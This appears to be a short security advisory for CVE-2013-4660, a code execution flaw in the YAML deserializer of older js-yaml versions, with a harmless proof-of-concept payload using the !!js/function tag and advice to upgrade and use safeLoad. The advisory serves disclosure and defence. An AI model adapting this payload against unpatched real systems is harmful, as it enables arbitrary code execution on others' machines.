UNKNOWN npm
Deserialization Code Execution in js-yaml
GHSA-xxvw-45rp-3mj2 · CVE-2013-4660
Published · Modified
Description
Versions 2.0.4 and earlier of js-yaml are affected by a code execution vulnerability in the YAML deserializer.
Proof of Concept
const yaml = require('js-yaml');
const x = `test: !!js/function >
function f() {
console.log(1);
}();`
yaml.load(x);
Recommendation
Update js-yaml to version 2.0.5 or later, and ensure that all instances where the .load() method is called are updated to use .safeLoad() instead.
Ready to move
Start Securing
Free, no credit card | First findings in minutes